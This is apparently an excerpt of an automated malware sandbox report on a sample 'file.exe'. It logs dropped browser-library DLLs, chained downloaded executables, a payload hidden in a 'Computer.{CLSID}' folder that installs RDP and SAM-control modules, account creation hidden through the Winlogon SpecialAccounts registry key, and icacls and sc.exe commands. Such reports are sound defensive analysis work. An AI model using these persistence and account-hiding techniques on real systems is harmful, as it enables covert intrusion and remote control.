Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File written: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RfxVmt.pdb source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: RfxVmt.pdbGCTL source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\BFCAAEHJDB.exe Unpacked PE file: 6.2.BFCAAEHJDB.exe.3370000.2.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: rfxvmt.dll.23.dr Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00417A40
Source: vcruntime140.dll.0.dr Static PE information: real checksum: 0x16dd4 should be: 0x13f4f
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: BFCAAEHJDB.exe.0.dr Static PE information: section name: .didata
Source: 7847438767[1].exe.0.dr Static PE information: section name: .didata
Source: euasv89vr56qz5toefmgc1.exe.7.dr Static PE information: section name: .xdata
Source: main.exe.14.dr Static PE information: section name: .xdata
Source: evtsrv.dll.23.dr Static PE information: section name: .xdata
Source: termsrv32.dll.23.dr Static PE information: section name: .xdata
Source: rdpctl.dll.23.dr Static PE information: section name: .xdata
Source: samctl.dll.23.dr Static PE information: section name: .xdata
Source: prgmgr.dll.23.dr Static PE information: section name: .xdata
Source: dwlmgr.dll.23.dr Static PE information: section name: .xdata
Source: cnccli.dll.23.dr Static PE information: section name: .xdata
Source: libi2p.dll.23.dr Static PE information: section name: .xdata
Source: S7evpAMe.23.dr Static PE information: section name: .xdata
Source: g29qQU9G.23.dr Static PE information: section name: .xdata
Source: h0yu5TYE.23.dr Static PE information: section name: .xdata
Source: Lx9RtFcl.23.dr Static PE information: section name: .xdata
Source: fJw4qvYl.23.dr Static PE information: section name: .xdata
Source: FHLBnhuN.23.dr Static PE information: section name: .xdata
Source: 1kuzcKGx.23.dr Static PE information: section name: .xdata
Source: KXEmxT2p.23.dr Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041CDD5 push ecx; ret 0_2_0041CDE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81B536 push ecx; ret 0_2_6C81B549
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03326575 push esi; ret 6_2_03326577
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72E8 push rsp; ret 23_2_00007FFDA38D72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72E4 push rsp; ret 23_2_00007FFDA38D72E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72E0 push rsp; ret 23_2_00007FFDA38D72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D727C push rsp; ret 23_2_00007FFDA38D727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D726F push qword ptr [rsi]; ret 23_2_00007FFDA38D7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72BC push rsp; ret 23_2_00007FFDA38D72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72B8 push rsp; ret 23_2_00007FFDA38D72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72DC push rsp; ret 23_2_00007FFDA38D72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72D8 push rsp; ret 23_2_00007FFDA38D72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72D4 push rsp; ret 23_2_00007FFDA38D72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72D0 push rsp; ret 23_2_00007FFDA38D72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72CC push rsp; ret 23_2_00007FFDA38D72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D72C4 push rsp; ret 23_2_00007FFDA38D72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79F7 push qword ptr [00007FFDD98D78C8h]; retf 23_2_00007FFDA38D79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79EF push qword ptr [00007FFDD98D78C0h]; retf 23_2_00007FFDA38D79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79E7 push qword ptr [00007FFDD98D78B8h]; retf 23_2_00007FFDA38D79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D7A17 push qword ptr [00007FFDAA8D78E8h]; retf 23_2_00007FFDA38D7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D7A0F push qword ptr [00007FFDD98D78E0h]; retf 23_2_00007FFDA38D7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D7A07 push qword ptr [00007FFDD98D78D8h]; retf 23_2_00007FFDA38D7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79FF push qword ptr [00007FFDD98D78D0h]; retf 23_2_00007FFDA38D7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79BB push qword ptr [00007FFDD98D788Ch]; retf 23_2_00007FFDA38D79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79B3 push qword ptr [00007FFDD98D7884h]; retf 23_2_00007FFDA38D79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79D3 push qword ptr [00007FFDD98D78A4h]; retf 23_2_00007FFDA38D79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79CB push qword ptr [00007FFDD98D789Ch]; retf 23_2_00007FFDA38D79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D79C3 push qword ptr [00007FFDD98D7894h]; retf 23_2_00007FFDA38D79C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA389875B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile, 23_2_00007FFDA389875B
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\7847438767[1].exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\S7evpAMe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\KXEmxT2p
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\h0yu5TYE
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\1kuzcKGx
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\fJw4qvYl
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\FHLBnhuN
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\feJ0dymt
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\g29qQU9G
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\Lx9RtFcl
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\ProgramData\BFCAAEHJDB.exe File created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\BFCAAEHJDB.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError, 23_2_00007FF620941DBC
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.3443178885.00007FFDA38A4000.00000002.00000001.01000000.00000015.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3443178885.00007FFDA38A4000.00000002.00000001.01000000.00000015.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: Lx9RtFcl.23.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Lx9RtFcl.23.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00417A40
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BFCAAEHJDB.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy, 23_2_00007FFDA38C7694
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 23_2_00007FFDA38960C8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 23_2_00007FFDA38CB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 23_2_00007FFDAC0A2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 23_2_00007FFDAC0D30A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 23_2_00007FFDAC0F4978
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo, 23_2_00007FFDAC121D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\g29qQU9G Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\Lx9RtFcl Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\KXEmxT2p Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\S7evpAMe Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\h0yu5TYE Jump to dropped file
